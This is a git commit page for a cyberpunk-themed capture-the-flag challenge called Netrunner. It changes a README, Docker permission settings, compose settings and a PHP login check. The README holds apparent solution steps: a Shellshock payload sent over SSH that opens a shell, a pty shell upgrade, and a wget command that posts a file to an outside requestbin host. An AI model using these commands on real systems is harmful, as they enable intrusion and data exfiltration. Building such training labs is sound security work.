1
0
Fork 0

Prod version CTF

This commit is contained in:
Aymeric 2019-01-29 22:21:05 +01:00
parent 71d5ff415e
commit 7828640ed9
4 changed files with 71 additions and 4 deletions

View File

@ -1 +1,63 @@
# Netrunner # Netrunner
chmod 777 mariadb
###
ssh puppet-master@10.2.0.1 -p 2222 -i ~/.ssh/maintenance '() { :;}; /bin/sh -i'
python3 -c 'import pty; pty.spawn("/bin/sh")'
sudo -g zetatech-maintenance wget --post-file=tech.note https://requestbin.fullcontact.com/XXXX
hint Netrunner 2/3: He seems to have a "ghost" in the shell
<style type="text/css">
@font-face {
font-family: 'Share Tech Mono';
font-style: normal;
font-weight: 400;
src: local('Share Tech Mono'), local('ShareTechMono-Regular'), url(../fonts/techmono.woff2) format('woff2');
unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
}
.netrunner {
color: #db0e15;
font-family: 'Share Tech Mono', monospace;
font-size: 16px;
font-weight: 300;
text-shadow: 0 0 5px rgba(219, 14, 21, .8);
background: url(https://image.ibb.co/h2hLAJ/bg.png);
padding: 20px;
}
.netrunner-bold {
font-weight: 700;
}
.netrunner-orange {
color: #c99c31;
text-shadow: 0 0 5px #c99c31b3;
}
</style>
<p class="netrunner" ><span class="netrunner-bold">V, I got a mission for you!</span> <br> <br>
We discoved a Netrunner who hack neural implants to create false memories. We spotted the target's interface on the Net at this address: <br>
<span class="netrunner-orange">http://149.202.58.152:8080</span> <br> <br>
Find out who he is and a way to stop him.</p>
<p class="netrunner" ><span class="netrunner-bold">Nice V! I owe you one!</span> <br> <br>
But before we go to visit him, I would like to have a means of pressure.
Here is his maintenance access: <br>
<span class="netrunner-orange">http://149.202.58.152:2222</span> <br> <br>
See what you can do and let me know.</p>
<p class="netrunner" ><span class="netrunner-bold">You doing great!</span> <br> <br>
But this access is not enough. See if you can get privileged access, the same used by Zetatech technician for maintenance.<br><br>
It will allow us to unplug it in case of a glitch.</p>

View File

@ -56,9 +56,9 @@ COPY ./banner /etc/banner
# Configure permissions # Configure permissions
RUN chmod -R 550 /home/${user} \ RUN chmod -R 550 /home/${user} \
&& chown -R ${user}:${user} /home/${user}/.ssh \ && chown -R root:${user} /home/${user} \
&& chmod 500 /home/${user}/.ssh \ && chmod 750 /home/${user}/.ssh \
&& chmod 400 /home/${user}/.ssh/authorized_keys \ && chmod 440 /home/${user}/.ssh/authorized_keys \
&& chmod 773 /tmp \ && chmod 773 /tmp \
&& chmod +t /tmp && chmod +t /tmp

View File

@ -1,4 +1,4 @@
version: '3' version: '2.2'
services: services:
web: web:
@ -39,3 +39,4 @@ services:
ports: ports:
- "2222:22" - "2222:22"
restart: always restart: always
cpus: '.3'

View File

@ -47,10 +47,14 @@ if (isset($_POST['login']) && $_POST['login'] == 'Login') {
</div>"; </div>";
$state->string = $html_login; $state->string = $html_login;
} elseif ( $num_row == 1 && $row['user'] === 'admin') {
$state->return = 'false';
$state->string = 'admin is desactivated. Use your login.';
} else { } else {
$state->return = 'false'; $state->return = 'false';
$state->string = 'Access Denied'; $state->string = 'Access Denied';
} }
} else { } else {
$state->return = 'password'; $state->return = 'password';
$state->string = 'Password Missing'; $state->string = 'Password Missing';